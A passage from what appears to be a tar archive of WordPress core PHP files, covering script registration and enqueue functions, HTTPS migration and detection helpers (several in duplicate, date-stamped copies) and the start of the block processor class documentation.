$wp_scripts->add_data( $handle, 'strategy', $args['strategy'] );
}
if ( ! empty( $args['fetchpriority'] ) ) {
$wp_scripts->add_data( $handle, 'fetchpriority', $args['fetchpriority'] );
}
return $registered;
}
/**
* Localizes a script.
*
* Works only if the script has already been registered.
*
* Accepts an associative array `$l10n` and creates a JavaScript object:
*
* "$object_name": {
* key: value,
* key: value,
* ...
* }
*
* @see WP_Scripts::localize()
* @link https://core.trac.wordpress.org/ticket/11520
*
* @since 2.2.0
*
* @todo Documentation cleanup
*
* @param string $handle Script handle the data will be attached to.
* @param string $object_name Name for the JavaScript object. Passed directly, so it should be qualified JS variable.
* Example: '/[a-zA-Z0-9_]+/'.
* @param array $l10n The data itself. The data can be either a single or multi-dimensional array.
* @return bool True if the script was successfully localized, false otherwise.
*/
function wp_localize_script( $handle, $object_name, $l10n ) {
$wp_scripts = wp_scripts();
return $wp_scripts->localize( $handle, $object_name, $l10n );
}
/**
* Sets translated strings for a script.
*
* Works only if the script has already been registered.
*
* @see WP_Scripts::set_translations()
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @global WP_Scripts $wp_scripts The WP_Scripts object for printing scripts.
*
* @param string $handle Script handle the textdomain will be attached to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was successfully localized, false otherwise.
*/
function wp_set_script_translations( $handle, $domain = 'default', $path = '' ) {
global $wp_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
return false;
}
return $wp_scripts->set_translations( $handle, $domain, $path );
}
/**
* Removes a registered script.
*
* Note: there are intentional safeguards in place to prevent critical admin scripts,
* such as jQuery core, from being unregistered.
*
* @see WP_Dependencies::remove()
*
* @since 2.1.0
*
* @global string $pagenow The filename of the current screen.
*
* @param string $handle Name of the script to be removed.
*/
function wp_deregister_script( $handle ) {
global $pagenow;
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
/**
* Do not allow accidental or negligent de-registering of critical scripts in the admin.
* Show minimal remorse if the correct hook is used.
*/
$current_filter = current_filter();
if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
( 'wp-login.php' === $pagenow && 'login_enqueue_scripts' !== $current_filter )
) {
$not_allowed = array(
'jquery',
'jquery-core',
'jquery-migrate',
'jquery-ui-core',
'jquery-ui-accordion',
'jquery-ui-autocomplete',
'jquery-ui-button',
'jquery-ui-datepicker',
'jquery-ui-dialog',
'jquery-ui-draggable',
'jquery-ui-droppable',
'jquery-ui-menu',
'jquery-ui-mouse',
'jquery-ui-position',
'jquery-ui-progressbar',
'jquery-ui-resizable',
'jquery-ui-selectable',
'jquery-ui-slider',
'jquery-ui-sortable',
'jquery-ui-spinner',
'jquery-ui-tabs',
'jquery-ui-tooltip',
'jquery-ui-widget',
'underscore',
'backbone',
);
if ( in_array( $handle, $not_allowed, true ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: Script name, 2: wp_enqueue_scripts */
__( 'Do not deregister the %1$s script in the administration area. To target the front-end theme, use the %2$s hook.' ),
"<code>$handle</code>",
'<code>wp_enqueue_scripts</code>'
),
'3.6.0'
);
return;
}
}
wp_scripts()->remove( $handle );
}
/**
* Enqueues a script.
*
* Registers the script if `$src` provided (does NOT overwrite), and enqueues it.
*
* @see WP_Dependencies::add()
* @see WP_Dependencies::add_data()
* @see WP_Dependencies::enqueue()
*
* @since 2.1.0
* @since 6.3.0 The $in_footer parameter of type boolean was overloaded to be an $args parameter of type array.
* @since 6.9.0 The $fetchpriority parameter of type string was added to the $args parameter of type array.
*
* @param string $handle Name of the script. Should be unique.
* @param string $src Full URL of the script, or path of the script relative to the WordPress root directory.
* Default empty.
* @param string[] $deps Optional. An array of registered script handles this script depends on. Default empty array.
* @param string|bool|null $ver Optional. String specifying script version number, if it has one, which is added to the URL
* as a query string for cache busting purposes. If version is set to false, a version
* number is automatically added equal to current installed WordPress version.
* If set to null, no version is added.
* @param array|bool $args {
* Optional. An array of additional script loading strategies. Default empty array.
* Otherwise, it may be a boolean in which case it determines whether the script is printed in the footer. Default false.
*
* @type string $strategy Optional. If provided, may be either 'defer' or 'async'.
* @type bool $in_footer Optional. Whether to print the script in the footer. Default 'false'.
* @type string $fetchpriority Optional. The fetch priority for the script. Default 'auto'.
* }
*/
function wp_enqueue_script( $handle, $src = '', $deps = array(), $ver = false, $args = array() ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
$wp_scripts = wp_scripts();
if ( $src || ! empty( $args ) ) {
$_handle = explode( '?', $handle );
if ( ! is_array( $args ) ) {
$args = array(
'in_footer' => (bool) $args,
);
}
if ( $src ) {
$wp_scripts->add( $_handle[0], $src, $deps, $ver );
}
if ( ! empty( $args['in_footer'] ) ) {
$wp_scripts->add_data( $_handle[0], 'group', 1 );
}
if ( ! empty( $args['strategy'] ) ) {
$wp_scripts->add_data( $_handle[0], 'strategy', $args['strategy'] );
}
if ( ! empty( $args['fetchpriority'] ) ) {
$wp_scripts->add_data( $_handle[0], 'fetchpriority', $args['fetchpriority'] );
}
}
$wp_scripts->enqueue( $handle );
}
/**
* Removes a previously enqueued script.
*
* @see WP_Dependencies::dequeue()
*
* @since 3.1.0
*
* @param string $handle Name of the script to be removed.
*/
function wp_dequeue_script( $handle ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
wp_scripts()->dequeue( $handle );
}
/**
* Determines whether a script has been added to the queue.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 2.8.0
* @since 3.5.0 'enqueued' added as an alias of the 'queue' list.
*
* @param string $handle Name of the script.
* @param string $status Optional. Status of the script to check. Default 'enqueued'.
* Accepts 'enqueued', 'registered', 'queue', 'to_do', and 'done'.
* @return bool Whether the script is queued.
*/
function wp_script_is( $handle, $status = 'enqueued' ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
return (bool) wp_scripts()->query( $handle, $status );
}
/**
* Adds metadata to a script.
*
* Works only if the script has already been registered.
*
* Possible values for $key and $value:
* 'strategy' string 'defer' or 'async'.
*
* @since 4.2.0
* @since 6.9.0 Updated possible values to remove reference to 'conditional' and add 'strategy'.
*
* @see WP_Dependencies::add_data()
*
* @param string $handle Name of the script.
* @param string $key Name of data point for which we're storing a value.
* @param mixed $value String containing the data to be added.
* @return bool True on success, false on failure.
*/
function wp_script_add_data( $handle, $key, $value ) {
return wp_scripts()->add_data( $handle, $key, $value );
}
https-migration-20260605201854.php 0000666 00000011205 15224151220 0011771 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
script-loader-react-refresh-runtime.php 0000666 00000000124 15224151220 0014231 0 ustar 00 <?php return array('dependencies' => array(), 'version' => '8f1acdfb845f670b0ef2');
https-detection-20260605141018.php 0000666 00000013341 15224151220 0011754 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
date-20260621170509.php 0000666 00000000620 15224151220 0007554 0 ustar 00 <?php
/**
* Class for generating SQL clauses that filter a primary query according to date.
*
* This file is deprecated, use 'wp-includes/class-wp-date-query.php' instead.
*
* @deprecated 5.3.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '5.3.0', WPINC . '/class-wp-date-query.php' );
/** WP_Date_Query class */
require_once ABSPATH . WPINC . '/class-wp-date-query.php';
https-migration-20260606092011.php 0000666 00000011205 15224151220 0011763 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260607003229.php 0000666 00000011205 15224151220 0011767 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260621081124.php 0000666 00000013341 15224151220 0011753 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-block-processor.php 0000666 00000210507 15224151220 0012116 0 ustar 00 <?php
/**
* Efficiently scan through block structure in document without parsing
* the entire block tree and all of its JSON attributes into memory.
*
* @package WordPress
* @subpackage Blocks
* @since 6.9.0
*/
/**
* Class for efficiently scanning through block structure in a document
* without parsing the entire block tree and JSON attributes into memory.
*
* ## Overview
*
* This class is designed to help analyze and modify block structure in a
* streaming fashion and to bridge the gap between parsed block trees and
* the text representing them.
*
* Use-cases for this class include but are not limited to:
*
* - Counting block types in a document.
* - Queuing stylesheets based on the presence of various block types.
* - Modifying blocks of a given type, i.e. migrations, updates, and styling.
* - Searching for content of specific kinds, e.g. checking for blocks
* with certain theme support attributes, or block bindings.
* - Adding CSS class names to the element wrapping a block’s inner blocks.
*
* > *Note!* If a fully-parsed block tree of a document is necessary, including
* > all the parsed JSON attributes, nested blocks, and HTML, consider
* > using {@see \parse_blocks()} instead which will parse the document
* > in one swift pass.
*
* For typical usage, jump first to the methods {@see self::next_block()},
* {@see self::next_delimiter()}, or {@see self::next_token()}.
*
* ### Values
*
* As a lower-level interface than {@see parse_blocks()} this class follows
* different performance-focused values:
*
* - Minimize allocations so that documents of any size may be processed
* on a fixed or marginal amount of memory.
* - Make hidden costs explicit so that calling code only has to pay the
* performance penalty for features it needs.
* - Operate with a streaming and re-entrant design to make it possible
* to operate on chunks of a document and to resume after pausing.
*
* This means that some operations might appear more cumbersome than one
* might expect. This design tradeoff opens up opportunity to wrap this in
* a convenience class to add higher-level functionality.
*
* ## Concepts
*
* All text documents can be considered a block document containing a combination
* of “freeform HTML” and explicit block structure. Block structure forms through
* special HTML comments called _delimiters_ which include a block type and,
* optionally, block attributes encoded as a JSON object payload.
*
* This processor is designed to scan through a block document from delimiter to
* delimiter, tracking how the delimiters impact the structure of the document.
* Spans of HTML appear between delimiters. If these spans exist at the top level
* of the document, meaning there is no containing block around them, they are
* considered freeform HTML content. If, however, they appear _inside_ block
* structure they are interpreted as `innerHTML` for the containing block.
*
* ### Tokens and scanning
*
* As the processor scans through a document is reports information about the token
* on which is pauses. Tokens represent spans of text in the input comprising block
* delimiters and spans of HTML.
*
